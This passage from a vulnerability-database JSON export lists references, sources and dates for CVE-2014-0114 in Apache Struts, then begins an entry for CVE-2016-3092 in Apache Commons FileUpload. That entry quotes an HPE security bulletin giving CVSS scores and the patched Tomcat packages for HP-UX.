"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10795183"
},
{
"trust": 0.6,
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10872142"
},
{
"trust": 0.6,
"url": "https://issues.apache.org/jira/browse/beanutils-520"
},
{
"trust": 0.6,
"url": "https://www.mail-archive.com/announce@apache.org/msg05413.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887121"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10957873"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887119"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887113"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10888007"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887999"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887973"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10888009"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/75922"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2568/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1427/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6494701"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2355/"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2293.2/"
},
{
"trust": 0.6,
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10879093"
},
{
"trust": 0.6,
"url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10872142"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/78218"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3134/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072128"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/"
},
{
"trust": 0.3,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379"
},
{
"trust": 0.3,
"url": "www-01.ibm.com/support/docview.wss?uid=swg21677335"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2014-0114"
},
{
"trust": 0.2,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
},
{
"trust": 0.2,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.2,
"url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000129"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1271"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000342"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000352"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1114"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-5397"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14063"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-14063"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000130"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000342"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000352"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1114"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000346"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000339"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000340"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000341"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000341"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.1/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-8088"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-8036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000344"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000345"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse\u0026downloadtype=distributions\u0026version=7.1.0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000340"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1339"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000180"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1339"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2939351"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000339"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000130"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-8036"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000180"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-8088"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-5397"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-1000344"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1000345"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.esb.enterprise\u0026downloadtype=securitypatches\u0026version=7.1.0"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2014-0114.html"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/en/support/security/"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/en/support/security/advisories/"
},
{
"trust": 0.1,
"url": "http://www.openwall.com/ove/"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00321"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00320"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00322"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00324"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00318"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00319"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00316"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00315"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00323"
},
{
"trust": 0.1,
"url": "http://support.openview.hp.com/selfsolve/document/lid/sis_00317"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.broker\u0026version=7.5.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/"
},
{
"trust": 0.1,
"url": "https://softwaresupport.hpe.com\u003e."
},
{
"trust": 0.1,
"url": "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets"
},
{
"trust": 0.1,
"url": "http://www.hpe.com/support/security_bulletin_archive"
},
{
"trust": 0.1,
"url": "https://www.hpe.com/info/report-security-vulnerability"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0763"
},
{
"trust": 0.1,
"url": "http://www.hpe.com/support/subscriber_choice"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3253"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0107"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-6429"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0050"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5652"
},
{
"trust": 0.1,
"url": "http://twitter.com/rgielen"
},
{
"trust": 0.1,
"url": "http://struts.apache.org/struts1eol-announcement.html"
},
{
"trust": 0.1,
"url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-applications/ba-p/6463188#.u2j7xeasxro"
}
],
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "149311"
},
{
"db": "PACKETSTORM",
"id": "126619"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "127868"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "128873"
},
{
"db": "PACKETSTORM",
"id": "139721"
},
{
"db": "PACKETSTORM",
"id": "126455"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "149311"
},
{
"db": "PACKETSTORM",
"id": "126619"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "127868"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "128873"
},
{
"db": "PACKETSTORM",
"id": "139721"
},
{
"db": "PACKETSTORM",
"id": "126455"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-30T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"date": "2014-04-29T00:00:00",
"db": "BID",
"id": "67121"
},
{
"date": "2018-09-11T15:41:48",
"db": "PACKETSTORM",
"id": "149311"
},
{
"date": "2014-05-14T19:25:00",
"db": "PACKETSTORM",
"id": "126619"
},
{
"date": "2014-05-19T03:19:48",
"db": "PACKETSTORM",
"id": "126692"
},
{
"date": "2018-08-23T17:19:18",
"db": "PACKETSTORM",
"id": "149050"
},
{
"date": "2014-08-14T22:49:43",
"db": "PACKETSTORM",
"id": "127868"
},
{
"date": "2016-07-20T18:29:00",
"db": "PACKETSTORM",
"id": "137980"
},
{
"date": "2019-10-10T14:43:55",
"db": "PACKETSTORM",
"id": "154792"
},
{
"date": "2014-10-28T18:09:30",
"db": "PACKETSTORM",
"id": "128873"
},
{
"date": "2016-11-15T00:42:48",
"db": "PACKETSTORM",
"id": "139721"
},
{
"date": "2014-05-03T02:09:52",
"db": "PACKETSTORM",
"id": "126455"
},
{
"date": "2014-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"date": "2014-04-30T10:49:03.973000",
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-13T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"date": "2019-07-17T07:00:00",
"db": "BID",
"id": "67121"
},
{
"date": "2023-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"date": "2024-11-21T02:01:23.960000",
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "126619"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 1.0
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Struts Input validation error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 0.6
}
}
var-201607-0321
Vulnerability from variot
The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string. Apache Commons FileUpload provided by the Apache Software Foundation contains a flaw when processing multi-part requests, which may lead to a denial-of-service (DoS). TERASOLUNA FW(Struts1) Team of NTT DATA Corporation reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.Processing a specially crafted request may result in the server's CPU resources to be exhausted. Apache Commons FileUpload is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the application to become unresponsive; resulting in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324759
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05324759 Version: 2
HPSBUX03665 rev.2 - HP-UX Tomcat-based Servlet Engine, Remote Denial of Service (DoS) and URL Redirection
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-11-09 Last Updated: 2016-11-08
Potential Security Impact: Remote: Denial of Service (DoS), URL Redirection
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in the HP-UX Tomcat-based Servlet Engine. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS) and URL Redirection.
References:
- PSRT110272
- CVE-2016-3092 - Remote denial of Service (DoS)
- CVE-2016-5388 - Remote URL Redirection
- PSRT110255
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HP-UX Tomcat-based Servlet v.7.x Engine B.11.31 - Tomcat 7 prior to D.7.0.70.01
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-3092
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-5388
8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has provided the following software update to resolve the vulnerabilities in HP-UX Apache Tomcat 7 Servlet Engine:
-
Tomcat 7.0.70.01 for HP-UX Release B.11.31 (IPF and PA-RISC)
- 64 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-64.depot
- 32 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-32.depot
-
Note: The depot file can be found here:
+ https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb r=HPUXWSATW501
MANUAL ACTIONS: Yes - Update
Download and install the software update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HPE and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see:
* https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb r=B6834AA
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31 IA/PA
===================
hpuxws22TOMCAT.TOMCAT
hpuxws22TOMCAT.TOMCAT2
action: install revision D.7.0.70.01 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release
Version:2 (rev.2) - 8 November 2016 Removed extraneous text from background section
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
